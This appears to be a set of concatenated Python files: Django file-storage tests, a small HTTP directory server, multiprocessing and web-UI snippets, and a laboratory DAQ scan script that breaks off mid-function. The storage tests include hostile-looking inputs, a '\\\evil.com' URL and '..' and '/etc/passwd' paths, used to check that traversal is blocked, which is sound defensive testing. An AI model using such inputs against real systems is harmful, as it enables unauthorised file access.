self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url('test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousOperation):
self.storage.exists('..')
with self.assertRaises(SuspiciousOperation):
self.storage.exists('/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise OSError(errno.EEXIST, 'simulated EEXIST')
elif path == os.path.join(self.temp_dir, 'error'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file', ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file', ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# OSErrors aside from EEXIST are still raised.
with self.assertRaises(OSError):
self.storage.save('error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise OSError(errno.ENOENT, 'simulated ENOENT')
elif path == os.path.join(self.temp_dir, 'error.file'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# OSErrors aside from ENOENT are still raised.
self.storage.save('error.file', ContentFile('delete with error'))
with self.assertRaises(OSError):
self.storage.delete('error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
@override_settings(
MEDIA_ROOT='media_root',
MEDIA_URL='media_url/',
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
Properties using settings values as defaults should be updated on
referenced settings change while specified values should be unchanged.
"""
storage = self.storage_class(
location='explicit_location',
base_url='explicit_base_url/',
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
'MEDIA_ROOT': 'overriden_media_root',
'MEDIA_URL': 'overriden_media_url/',
'FILE_UPLOAD_PERMISSIONS': 0o333,
'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, 'explicit_location')
self.assertIn('explicit_location', storage.location)
self.assertEqual(storage.base_url, 'explicit_base_url/')
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
self.assertEqual(
defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super(DiscardingFalseContentStorage, self)._save(name, content)
return ''
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = StringIO('content')
self.storage.save('tests/stringio', output)
self.assertTrue(self.storage.exists('tests/stringio'))
with self.storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
with obj.normal as normal:
normal.open('wb')
normal.write(b'updated')
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b'updated')
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename get truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform.startswith('win'),
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
__init__.py | # To avoid organizerImports and declarations, I created a pther file to initizalize
from .__server_socket__ import app, socketio, render_template, send, requestFlask
from app import views, api_views, socketio_views
from threading import Thread
task_coins = Thread(target=socketio_views.update_coins_from_api)
task_coins.start()
task_send_coins_value = Thread(
target=socketio_views.send_current_coins_value())
task_send_coins_value.start()
|
directory_server.py | # ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from __future__ import print_function
from traits.api import String, Str, Int
# from traitsui.api import View, Item, TableEditor
# ============= standard library imports ========================
from six.moves.BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from cStringIO import StringIO
import cgi
# import string, cgi, time
import os # os. path
import six.moves.urllib.request, six.moves.urllib.parse, six.moves.urllib.error
import posixpath
import sys
import shutil
import mimetypes
from threading import Thread
# ============= local library imports ==========================
# ===============================================================================
# for debugging
# ===============================================================================
merc = os.path.join(os.path.expanduser("~"), "Programming", "mercurial")
src = os.path.join(merc, "pychron_uv")
sys.path.insert(0, src)
# ===============================================================================
#
# ===============================================================================s
from pychron.loggable import Loggable
if not mimetypes.inited:
mimetypes.init() # try to read system mime.types
class DirectoryHandler(BaseHTTPRequestHandler):
extensions_map = mimetypes.types_map.copy()
extensions_map.update(
{
"": "application/octet-stream", # Default
".py": "text/plain",
".c": "text/plain",
".h": "text/plain",
}
)
def do_GET(self):
f = self.send_head()
if f:
self._copy_file(f, self.wfile)
f.close()
def do_HEAD(self):
f = self.send_head()
if f:
f.close()
def send_head(self):
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self._translate_path(self.path)
f = None
if os.path.isdir(path):
if not self.path.endswith("/"):
# redirect browser - doing basically what apache does
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self._list_directory(path)
ctype = self.guess_type(path)
try:
# Always read in binary mode. Opening files in text mode may cause
# newline translations, making the actual size of the content
# transmitted *less* than the content-length!
f = open(path, "rb")
except IOError:
self.send_error(404, "File not found")
return None
self.send_response(200)
self.send_header("Content-type", ctype)
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
self.end_headers()
return f
def _copy_file(self, source, outputfile):
shutil.copyfileobj(source, outputfile)
def _list_directory(self, path):
"""Helper to produce a directory listing (absent index.html).
Return value is either a file object, or None (indicating an
error). In either case, the headers are sent, making the
interface the same as for send_head().
"""
try:
ll = os.listdir(path)
except os.error:
self.send_error(404, "No permission to ll directory")
return None
ll.sort(key=lambda a: a.lower())
f = StringIO()
displaypath = cgi.escape(six.moves.urllib.parse.unquote(self.path))
f.write('<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
f.write("<html>\n<title>Directory listing for %s</title>\n" % displaypath)
f.write("<body>\n<h2>Directory listing for %s</h2>\n" % displaypath)
f.write("<hr>\n<ul>\n")
for name in ll:
fullname = os.path.join(path, name)
displayname = linkname = name
# Append / for directories or @ for symbolic links
if os.path.isdir(fullname):
displayname = name + "/"
linkname = name + "/"
if os.path.islink(fullname):
displayname = name + "@"
# Note: a link to a directory displays with @ and links with /
f.write(
'<li><a href="%s">%s</a>\n'
% (six.moves.urllib.parse.quote(linkname), cgi.escape(displayname))
)
f.write("</ul>\n<hr>\n</body>\n</html>\n")
length = f.tell()
f.seek(0)
self.send_response(200)
encoding = sys.getfilesystemencoding()
self.send_header("Content-type", "text/html; charset=%s" % encoding)
self.send_header("Content-Length", str(length))
self.end_headers()
return f
def _translate_path(self, path):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = path.split("?", 1)[0]
path = path.split("#", 1)[0]
path = posixpath.normpath(six.moves.urllib.parse.unquote(path))
words = path.split("/")
words = [_f for _f in words if _f]
path = self.server.root
# path = os.getcwd()
for word in words:
_drive, word = os.path.splitdrive(word)
_head, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
def guess_type(self, path):
"""Guess the type of a file.
Argument is a PATH (a filename).
Return value is a string of the form type/subtype,
usable for a MIME Content-type header.
The default implementation looks the file's extension
up in the table self.extensions_map, using application/octet-stream
as a default; however it would be permissible (if
slow) to look inside the data to make a better guess.
"""
_base, ext = posixpath.splitext(path)
if ext in self.extensions_map:
return self.extensions_map[ext]
ext = ext.lower()
if ext in self.extensions_map:
return self.extensions_map[ext]
else:
return self.extensions_map[""]
class _DirectoryServer(HTTPServer):
root = ""
class DirectoryServer(Loggable):
root = String
host = Str
port = Int
_server = None
def _root_changed(self):
if self._server:
self._server.root = self.root
def start(self):
t = Thread(target=self._start)
t.start()
return t
def _start(self):
self.info("Directory server started. {} {}".format(self.host, self.port))
self.info("serving {}".format(self.root))
host = self.host
port = self.port
if not host:
host = "localhost"
if not port:
port = 8080
self._server = _DirectoryServer((host, port), DirectoryHandler)
self._server.root = self.root
self._server.serve_forever()
def stop(self):
self._server.shutdown()
def serve():
try:
# server = HTTPServer(('', 8080), MyHandler)
server = DirectoryServer(host="localhost", port=8080)
server.root = "/Users/ross/Sandbox/raster"
print("started httpserver...")
server.start()
except KeyboardInterrupt:
print("^C received, shutting down server")
server.socket.close()
def main():
serve()
if __name__ == "__main__":
main()
# ============= EOF =============================================
|
process_demo.py | from multiprocessing import Process
import os
def loop():
i = 0
while True:
i += 1
def main():
print('start')
for _ in range(os.cpu_count()):
t = Process(target=loop)
t.start()
if __name__ == '__main__':
main()
|
visual_cortex.py | # Python Modules
from multiprocessing import Process
import sys
import pathlib
import time
# Web server Modules
from aiohttp import web
import aiohttp_jinja2
import jinja2
# Deeplodocus modules
from deeplodocus.utils.notification import Notification
from deeplodocus.brain.visual_cortex.routes import Routes
from deeplodocus.brain.visual_cortex.middlewares import setup_middlewares
# Deeplodocus flags
from deeplodocus.utils.flags.notif import *
class VisualCortex(object):
"""
AUTHORS:
--------
:author: Alix Leroy
DESCRIPTION:
------------
A User Interface accessible via a Web Browser
TODO : Include Plotly for better visualization
"""
def __init__(self):
"""
AUTHORS:
--------
:author: Alix Leroy
DESCRIPTION:
------------
Start the user interface in a second Process linked to the main one.
"""
# Create the web server in a second process
self.process = Process(target=self.__run, args=())
self.process.daemon = True # Allow to kill the child with the parent
self.process.start()
# self.process.join()
time.sleep(0.5)
def __run(self):
"""
AUTHORS:
--------
:author: Alix Leroy
DESCRIPTION:
------------
Run the web server
PARAMETERS:
-----------
None
RETURN:
-------
:return: None
"""
VISUAL_CORTEX_ROOT = pathlib.Path(__file__).parent
host = "0.0.0.0"
port = 8080
Notification(DEEP_NOTIF_SUCCESS, "Brain : Visual Cortex running on : http://%s:%i" %(host, port))
app = web.Application() # Start the web application
aiohttp_jinja2.setup(app, loader = jinja2.PackageLoader('deeplodocus', 'brain/visual_cortex/templates')) # Load the templates
Routes().setup_routes(app=app, project_root=VISUAL_CORTEX_ROOT) # Define the routes
setup_middlewares(app) # Define the middlewares
web.run_app(app=app, print=None, host=host, port=port) # Run the app
Notification(DEEP_NOTIF_SUCCESS, "Visual Cortex sleeping.")
sys.exit(0) # kill the child process
def stop(self):
"""
AUTHORS:
--------
:author: Alix Leroy
DESCRIPTION:
------------
Stop the server
PARAMETERS:
-----------
None
RETURN:
-------
:return: None
"""
self.process.terminate() # Terminate the process
|
workflow.py | from functools import wraps
from datetime import datetime
import time
import sys
import lttb
import numpy as np
import threading
import os
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
import ipdb
import scipy.io as io
from copy import copy
# from tranmission_Forge import MZCalibrate
from matplotlib.animation import FuncAnimation
work_dir = path = os.path.abspath(__file__ + '/..')
path = 'Z:/PythonSoftware/NewInstrumentControl'
if not path in sys.path:
sys.path.insert(0, path)
# import pyUtilities as ut
# import msvcrt
from pyLaser import NewFocus6700,Toptica1050
from pyWavemeter import Wavemeter
from pyPowerMeter import ThorlabsP1xx
# from workers import DcScan, FreeScan
import h5py
from nidaqmx.constants import AcquisitionType, TaskMode
import nidaqmx
from plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot
import plotly.graph_objs as go
import matplotlib.pyplot as plt
import ipywidgets as widgets
from ipywidgets import interact, interactive, Layout
class DCScan():
def __init__(self, **kwargs):
self.lsr = kwargs.get('laser', None)
self.wavemeter = kwargs.get('wavemeter', None)
self.wavemeter_ch = kwargs.get('wavemeter_ch', 2)
self.daq_ch = kwargs.get('daq_ch', ['ai0'])
self.daq_dev = kwargs.get('daq_dev', 'Dev1')
self.Pin_ratio = kwargs.get('Pin_ratio', 2/98)
self.Pout_ratio = kwargs.get('Pout_ratio', 1/10)
self.Pmeter_in = kwargs.get('Pmeter_in', None)
self.Pmeter_out = kwargs.get('Pmeter_out',None)
self._stop_shift = kwargs.get('_top_shift ',-1)
self.sub = kwargs.get('sub', 200)
init_notebook_mode(connected=True)
def run(self):
lsr = self.lsr
time.sleep(0.05)
wlm = self.wavemeter
time.sleep(0.5)
lim = lsr.scan_limit
print('LIMITS: {}'.format(lim))
time.sleep(0.05)
lsr.lbd = lim[0]
time.sleep(0.05)
speed = lsr.scan_speed
time.sleep(0.05)
scan_time = np.diff(lim)[0]/speed
print('-'*30)
print('Limits: {} - {}nm'.format(lim[0], lim[1]))
print('Scan Speed: {} nm/s'.format(speed))
print('Scan Time: {}s'.format(scan_time))
while lsr._is_changing_lbd or np.abs(lsr.lbd -lim[0])>0.5 :
print('setting lbd: {:.3f}nm'.format(lsr.lbd),end = "\r")
time.sleep(0.1)
print('setting lbd: {:.3f}nm'.format(lsr.lbd))
# -- Wait for stabilization --
# -----------------------------------------------
time.sleep(1)
if wlm:
wlm.pulsemode = False
wlm.widemode = False
wlm.fastmode = False
wlm.channel = self.wavemeter_ch
wlm.exposure = 'auto'
wlm.acquire = True
print('-'*30)
print('Getting Wavemeter for Start Wavelength:')
time.sleep(2.5)
lbd_start = wlm.lbd
wlm.acquire = False
print("\tWavelength Start {:.3f}".format(lbd_start))
else:
lbd_start = lsr.lbd
# Setup the DAQ
ch = self.daq_ch
dev = self.daq_dev
system = nidaqmx.system.System.local()
device = system.devices[dev]
device.reset_device()
clk = 0.5e6
Npts = scan_time*clk
self.readtask = nidaqmx.Task()
if not type(ch)==list:
ch = [ch]
ch = dev + '/' + ',{}/'.format(dev).join(ch)
print('-'*30)
print('Setting up DAQ')
print('\tReading from {}'.format(ch))
print('\tNpts: {}'.format(Npts))
self.readtask.ai_channels.add_ai_voltage_chan(ch,min_val=-0.5, max_val=10)
self.readtask.timing.cfg_samp_clk_timing(clk, sample_mode=AcquisitionType.CONTINUOUS, samps_per_chan=int(Npts))
# daq.SetupRead(read_ch=['ai0', 'ai23'])
self._daqScanning = True
self.data = []
self.dt = []
self._done_get_data = False
def _GetData():
self.time_start_daq = time.time()
self.data += self.readtask.read(number_of_samples_per_channel=int(Npts), timeout = scan_time*1.5)
self.time_end_daq = time.time()
print('*'*30)
print('Got DAQ data')
self.readtask.stop()
self.readtask.close()
self.data = np.array(self.data)
self._done_get_data = True
threadDAQdata = threading.Thread(target=_GetData, args=())
threadDAQdata.daemon = True
# lim = lsr.scan_limit
print(lim)
lsr.scan = True
self.readtask.start()
t1 = time.time()
_lbdscan = [lsr.lbd]
# t_scan =
threadDAQdata.start()
print('-'*20 + 'Start Scan')
print(lim)
